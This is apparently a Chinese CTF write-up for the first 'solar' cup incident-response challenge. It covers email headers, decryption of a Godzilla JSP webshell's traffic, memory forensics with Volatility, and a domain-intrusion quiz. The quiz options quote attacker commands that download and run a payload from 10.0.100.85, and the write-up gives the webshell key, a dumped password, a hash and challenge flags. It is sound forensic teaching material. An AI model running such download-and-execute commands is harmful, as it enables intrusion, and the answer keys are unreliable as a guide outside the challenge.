应急响应-第一届solar

https://mp.weixin.qq.com/s/kMvwfBJgd7ugaWzm5U-5Ww

https://www.cnblogs.com/agonysec/p/18663408/the-first-solar-cup-emergency-response-challenge-part-wp-zvl0ij

签到

本题作为签到题,请给出邮服发件顺序。
Received: from mail.da4s8gag.com ([140.143.207.229])
by newxmmxszc6-1.qq.com (NewMX) with SMTP id 6010A8AD
for ; Thu, 17 Oct 2024 11:24:01 +0800
X-QQ-mid: xmmxszc6-1t1729135441tm9qrjq3k
X-QQ-XMRINFO: NgToQqU5s31XQ+vYT/V7+uk=
Authentication-Results: mx.qq.com; spf=none smtp.mailfrom=;
dkim=none; dmarc=none(permerror) header.from=solar.sec
Received: from mail.solar.sec (VM-20-3-centos [127.0.0.1])
by mail.da4s8gag.com (Postfix) with ESMTP id 2EF0A60264
for ; Thu, 17 Oct 2024 11:24:01 +0800 (CST)
Date: Thu, 17 Oct 2024 11:24:01 +0800
To: hellosolartest@qq.com
From: 鍏嬪競缃戜俊
Subject:xxxxxxxxxx
Message-Id: <20241017112401.032146@mail.solar.sec>
X-Mailer: QQMail 2.x
XXXXXXXXXX
flag格式为flag{domain1|...|domainN}

flag{mail.solar.sec|mail.da4s8gag.com|newxmmxszc6-1.qq.com}

每经过一台邮件服务器,就会在“最上面”新增一条 Received

所以:
最下面的 Received = 最早(邮件起点)
最上面的 Received = 最后(收件服务器)

数据库

日志流量

环境

image-20260127140804443

日志流量
题目文件:tomcat-wireshark.zip/web
日志流量-1
新手运维小王的Geoserver遭到了攻击:
黑客疑似删除了webshell后门,小王找到了可能是攻击痕迹的文件但不一定是正确的,请帮他排查一下。
flag格式 flag{xxxx}
日志流量-2
新手运维小王的Geoserver遭到了攻击:
小王拿到了当时被入侵时的流量,其中一个IP有访问webshell的流量,已提取部分放在了两个pcapng中了。请帮他解密该流量。
flag格式 flag{xxxx}
日志流量-3
新手运维小王的Geoserver遭到了攻击:
小王拿到了当时被入侵时的流量,黑客疑似通过webshell上传了文件,请看看里面是什么。
flag格式 flag{xxxx}

web日志分析-查询后门

存在web日志与流量包

分析web日志

攻击者从15/Dec/2024:23:02:33开始进行了大量的目录扫描,ip为10.0.100.22

web日志大多数都为404的目录扫描

image-20260127143527915

扫描到/geoserver/index.html

image-20260127143920632

并在15/Dec/2024:23:14:11扫描到/geoserver/login

并且成功登录进入后台

image-20260127150007725

第一次尝试上传文件

image-20260127150109024

上传功能点文件路径:/test/file.shp,上传文件为b.jsp,响应500,未成功上传

最后上传文件b.jsp,上传功能点文件路径为atk/file.shp,响应202,上传成功

image-20260127153628718

访问对应目录,发现不存在该文件,根据题目提示可能为攻击者删除了该文件

image-20260127154619524

攻击者上传jsp文件后,删除该文件,排查思路

当访问 JSP 页面时,Tomcat 会将 JSP 编译为 Java → 再编译为 .class,默认生成目录为:$CATALINA_BASE/work/Catalina/<host>/<webapp>/org/apache/jsp/,比如:/apache-tomcat-9.0.96/work/Catalina/localhost/ROOT/org/apache/jsp/b_jsp.class,当上传目录中的恶意文件被删除时,我们需要排查攻击者执行恶意文件时加载的类和java源码(jsp编译缓存目录$CATALINA_HOME/work/Catalina/

查看缓存目录,存在执行b.jsp文件生成的缓存java文件和加载的class文件

image-20260127155816676

AI对该文件的解释:

该文件是Apache Tomcat编译生成的JSP servlet类文件(对应原始JSP页面b.jsp),生成时间为2024-12-16 09:23:36 UTC。文件结构基于标准JSP框架,但嵌入可疑代码,构成安全风险。

攻击者上传的文件:      b.jsp
         ↓(首次访问)
Tomcat 自动生成:       b_jsp.java
         ↓(编译)
Tomcat 自动生成:       b_jsp.class / b_jsp$X.class

JSP 本质就是“写在 HTML 里的 Java 代码”,tomcat在处理jsp时,会将jsp中的脚本代码(<% %>中的内容)原样编译成Java Servlet

其中部分代码为jsp的原封不动的脚本代码,部分代码为tomcat加载的代码

image-20260127155940592

存在静态特征:base64、xc关键字、aes关键字,哥斯拉aes马,确认攻击者后门

https://cloud.tencent.com/developer/article/2287311

image-20260127161413139

code参数为base64,解码

image-20260127170315359

f!l^a*g{A7b4_X9zK_2v8N_wL5q4}

流量分析-访问文件

筛选http

image-20260127215551168

追踪http流

image-20260127215642800

image-20260127220009247

image-20260127220056915

为哥斯拉三次请求建立连接

加密方式为aes_raw,密钥为代码中xc的参数a2550eeab0724a69,密码默认pass

image-20260127220757922

解密哥斯拉流量

image-20260127221208653

我们解密请求体和响应体

image-20260127221246251

image-20260127221331456

依次对请求响应数据进行解密

image-20260127221753090

image-20260127222047090

image-20260127222152972

image-20260127222243561

image-20260127222311914

flag{sA4hP_89dFh_x09tY_lL4SI4}

定位的是7230这个数据包

image-20260127222417369

流量分析-上传文件

继续分析流,发现上传了flag.pdf文件

image-20260127224016362

工具解密后会自动生成GodzillaRequestDecode.bin文件,查看文件

image-20260127224452102

image-20260127224528707

文件另存为pdf

image-20260127224936450

image-20260127224949166

查看该pdf

image-20260127225003392

flag{dD7g_jk90_jnVm_aPkcs}

内存取证

内存取证
题目文件:SERVER-2008-20241220-162057
内存取证-1
请找到rdp连接的跳板地址
flag格式 flag{1.1.1.1}
内存取证-2
请找到攻击者下载黑客工具的IP地址
flag格式 flag{1.1.1.1}
内存取证-3
攻击者获取的“FusionManager节点操作系统帐户(业务帐户)”的密码是什么
flag格式 flag{xxxx}
内存取证-4
请找到攻击者创建的用户
flag格式 flag{xxxx}
内存取证-5
请找到攻击者利用跳板rdp登录的时间
flag格式 flag{2024/01/01 00:00:00}
内存取证-6
请找到攻击者创建的用户的密码哈希值
flag格式 flag{XXXX}

查看image

python2 vol.py -f SERVER-2008-20241220-162057.raw imageinfo

Win7SP1x64

rdp连接的跳板地址

查看网络连接情况,rdp端口3389,查看3389端口连接信息

image-20260129112034995

本机 192.168.60.150 的 3389 端口,当前正与 192.168.60.220:34121 建立着一个已建立(ESTABLISHED)的 TCP 连接。

192.168.60.220 正在通过 RDP 连接这台主机。

跳板地址192.168.60.220

攻击者下载黑客工具的IP地址

查看历史cmd

python2 vol.py -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 cmdscan

image-20260129112736717

155.94.204.67

“FusionManager节点操作系统帐户(业务帐户)”的密码

cmd中查看了pass.txt

image-20260129112920835

查找pass.txt

python2 vol.py -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 filescan | grep "pass.txt"

image-20260129113116755

0x000000007e4cedd0

dump文件

python2 vol.py -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000007e4cedd0 -D ./

查看文件

image-20260129113407326

GalaxManager_2012

创建的用户

查看windows安全日志文件:Security.evtx

python2 vol.py -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 filescan | grep "Security.evtx"

image-20260129123551062

dump日志文件

image-20260129123606896

修改文件后缀为evtx,并使用事件查看器打开

image-20260129123952350

查看事件id4720,找到创建用户

image-20260129124232582

创建了用户ASP.NET,时间为2024/12/21 0:14:42

ASP.NET

利用跳板rdp登录的时间

查看日志中4624,并且登录名为ASP.NET

image-20260129124916035

2024/12/21 0:15:34

创建的用户的密码哈希值

hashdump查看hash

python2 vol.py -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 hashdump

image-20260129124357519

5ffe97489cbec1e08d0c6339ec39416d

综合应急

综合应急
题目文件:FOG日志
综合应急-1
题目类型为选择题,提交机会只有一次,请慎重提交。
1.哪台服务器是最先沦陷的?(计算机名)
A.sql01
B.sql02
C.web01
D.dc02
2.攻击者创建了一个恶意的程序集,程序集名为?
A.Classlibarry3
B.CmdExec
C.Classlibarry1
D.Classlibarry2
3.攻击者利用程序集第一次执行的命令是什么?
A.powershell -c iwr -uri http://10.0.100.85:81/2.exe -o C:/windows/tasks/2.exe
B.powershell -c C:/windows/tasks/2.exe
C.cmd.exe /c powershell -c C:/windows/tasks/2.exe
D.cmd.exe /c powershell -c iwr -uri http://10.0.100.85:81/2.exe -o C:/windows/tasks/2.exe
4.攻击者新建的用户是什么?
A.administrator
B.admin
C.test$
D.sql01
5.攻击者第一次远程登陆的用户是什么?
A.administrator
B.admin
C.test$
D.sql01
6.攻击者的计算机名是什么?
A.Kali
B.sql01
C.sql02
D.dc02
7.攻击者第一次登陆第二台沦陷服务器数据库使用了什么账户?
A.administrator
B.sql01
C.sql02
D.admin
8.攻击者在第二台服务器上传并执行了木马,紧接着修改了系统的什么的配置?
A.防火墙
B.Defender
C.服务
D.定时任务
9.攻击者可能通过什么漏洞横向到第三台沦陷的服务器?
A.命令执行
B.文件上传
C.弱口令
D.文件上传+文件读取
10.攻击者通过应用的漏洞获取了第三台沦陷的服务器权限,该权限用户安全 ID为?
A.S-1-5-21-1687412249-3843849720-271823590-1106
B.S-1-5-21-1687412249-3843849720-271823590-500
C.S-1-5-21-1687412249-3843849720-271823590-1001
D.S-1-5-21-1687412249-3843849720-271823590-1100
11.攻击者紧接着调用了一个powershell脚本,该脚本的作用是什么?
A.横向渗透
B.读取凭据
C.远控
D.信息收集
12.攻击者利用了什么工具使web01和dc02进行交互?
A.SpoolSample.exe
B.impacket-ntlmrelayx
C.Smbclient
D.printerbug.py
13.攻击者使用什么漏洞获取dc02的票据(多选)
A.CVE-2021-1675
B.无约束委派
C.约束委派
D.MS14-025
14.攻击者使用什么漏洞获取dc03的票据(多选)
A.CVE-2021-1675
B.约束委派
C.无约束委派 
D.MS14-025
15.攻击者ip是什么?
A.10.0.10.41
B.10.0.100.38
C.10.0.10.40
D.10.0.100.85
16.攻击者在第一台服务器执行过一个powershell的脚本,该脚本的名称是什么?
A.pv.ps1
B.powerview.ps1
C.run.ps1
D.Powermad.ps1
17.对第三台沦陷的服务器发起漏洞攻击的IP是什么?
A.10.0.10.41
B.10.0.100.38
C.10.0.10.40
D.10.0.100.85
18.攻击者什么时候修改了web01的管理员账号密码?
A.24/12/18 9:59:44.000
B.24/12/18 9:57:42.000
B.24/12/18 9:50:00.000
B.24/12/18 10:08:12.000
19.dc02是一台拥有双网卡的服务器,他的ip分别是?(多选)
A.10.0.100.22 
B.10.0.11.6 
C.10.0.11.7 
D.10.0.10.43
20.该企业有三个域,请问这三个域的域名分别是什么?(多选)
A.set.local
B.sub.set.com
C.set.com
D.solar.com
21.以下哪些描述正确地反映了这些域之间的信任关系?(多选)
A. 林1主域与林1子域之间存在双向信任关系
B. 林1子域可以信任林1主域,但林1主域不能信任林1子域
C. 林2主域与林1子域之间存在双向信任关系
D. 林2主域与林1子域之间不存在信任关系
22.攻击者在获取dc03之后,可能还攻击了哪些服务器?(多选)
A.10.0.11.10 
B.10.0.11.11 
C.10.0.11.8 
D.10.0.11.236
综合应急-2
攻击者上传了代理工具,请写出他的最终存放路径
格式为flag{x:\xxxxx\xxxx\xxxxxx}